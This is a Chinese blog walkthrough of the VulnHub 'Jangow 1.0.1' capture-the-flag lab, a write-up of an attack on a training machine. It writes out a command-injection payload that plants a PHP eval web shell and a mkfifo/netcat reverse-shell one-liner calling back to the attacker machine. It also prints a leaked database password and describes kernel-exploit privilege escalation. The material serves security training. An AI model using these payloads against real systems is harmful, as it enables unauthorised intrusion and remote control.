VulnHub_Jangow: 1.0.1

已于 2022-04-20 14:02:53 修改
阅读量636 收藏 1
点赞数
分类专栏: CTF 文章标签: linux java python 数据库 安全
于 2022-04-16 20:35:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/124223751
版权

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.31.9
BreakOut:192.168.31.227

信息收集

使用nmap探测目标主机端口2个端口,一个FTP,一个http
1e8c9be8014ec3ccf86391af7f29316b.png
80端口网站打开是一个目录
d7ea4bc7d8a9474a6aef298091e6f281.png
打开site后是一个网站
a9f0784ab22a4f43c5547b2fffbdf9b6.png
简单查看后发现Buscar可以到跳转到其他页面,并且可接收参数
3a99a5805cda2c660ef7474cedf99322.png

GETSHELL

经过测试这个接口可以执行命令
b2d29336afdc8ce72d93936096f4b466.png
查看页面源码发现使用buscar接收参数后使用system函数进行执行命令
777669258745ab20bf124549ffbbc9f2.png
尝试反弹shell没有成功,然后查看用户目录下有一个user.txt
ef566b00666110942e96ab335b8d5487.png
访问后得到第一个flag
76abf6e1db938c90ad4a60a53b17f271.png
在网站目录下查看wordpress目录,发现一个config.php
0d88b5cf563f66bf0e83666a71ec8fd9.png
查看配置文件拿到数据库用户名和密码,通过代码判断应该是MySQL的数据库
589a7035f87b7a79cb17dd727d58e516.png

$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

使用获取到的用户名和密码尝试登录失败
f07ba49866157274beebfad5a9842d05.png
然后尝试使用系统的用户和配置文件的密码组合发现登录成功,但是无法通过FTP获取更多信息
c9f04052a8cf8b59a2ede15749232d67.png
尝试使用命令执行写入shell

http://192.168.31.227/site/busque.php?buscar=echo '<?php @eval($_POST['x']); ?>' >> shell.php

45b05ea0b017d6052323e77913b90899.png
检查看到shell写入成功
4f5152e7a416e41bd5eea2d66c8ec852.png
测试链接成功
5f60534113331b3d9e33cb4c67dcf411.png
8c8bf778ce529e4d3f465d53d24ab744.png
查看系统版本和内核信息
f7277088b83e8cf5692409a658e22a08.png
查看.backup文件,发现存在用户名密码
b6443005491605acb6723de04c19e1d0.png
反弹shell
使用蚁剑创建文件x.php,将以下内容写入文件,在kali上监听443端口,然后访问该文件

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.239 443 >/tmp/f");?>

3e4f8dcce6c5263269c2d82ed71abf12.png
然后使用python获取一个ttyshell

python3 -c 'import pty;pty.spawn("/bin/bash")'

e3bcb87534aafa1f01197c330608d7be.png
然后我们们用之前获取的用户名密码切换到jangow01用户
f433954e858b579c67d2338b8a6b2ac1.png

提权

通过上面获取的内核版本信息,使用searchspolit查询发现有可用的提权POC
76702ae90b9b333a2ce7fe1b87ec111a.png
然后将POC下载到本地
ccb8605f9e8dc43f92147d454cfbe16c.png
将POC进行编译
9e87e3f7adba1c6615a8c93ab5a807d3.png
通过尝试最终在jangow01用户的家目录下上传了exp
d53db4a763f2fb4b91d00375277c5c3d.png
在赋权执行时发现执行失败
71a4248b8d0e587aba728fdd26341415.png
然后尝试使用ssh进行本地连接
eaf2a2074dde9b79d4c31bb705e0acb5.png
使用ssh连接后发现仍无法执行,最终确定因为编译机器kali为ARM架构,靶机为x86所以会导致执行失败,然后将POC上传到靶机进行编译后成功提权
2927d536867160fbb7629b6f1813ea34.png
查看最后一个Flag
6b728c04e7094b59fe27ab67ea99613f.png

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2683
迟到的文章,就当库存发出来吧~
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3172
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
Jangow
最新发布
weixin_44770698的博客
07-18 1070
Jangow
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3046
一次打靶记录。
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1912
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1111
Vulnhub - JANGOW: 1.0.1 靶标实战
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送jar包:geronimo-j2ee-management_1.1_spec-1.0.1.jar; 赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含...
GaussDB_100_1.0.1-DATABASE-REDHAT-64bit.tar.gz
04-14
本篇文章将详细阐述如何在Red Hat Enterprise Linux 64位环境下安装GaussDB 100的1.0.1版本,以及在单机部署中的关键步骤,这些都是基于大量实践和实验的总结。 首先,我们需要准备的是名为"GaussDB_100_1.0.1-...
Nationstech.N32G45x_DFP.1.0.1.pack
12-11
keil.for .nations
geronimo-jta_1.0.1B_spec-1.0.1.jar
02-24
java运行依赖jar包
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz
04-23
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz 这个压缩包文件,显然是华为云数据库产品GaussDB的一个特定版本。GaussDB是华为自主研发的分布式数据库系统,它在设计上融合了最新的数据库技术和华为多年的...
jangow-01-1.0.1
qq_46140711的博客
09-22 1176
jangow-01-1.0.1靶机练习
Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 720
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4327
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5689
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1128
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1167
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 719
网络安全
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值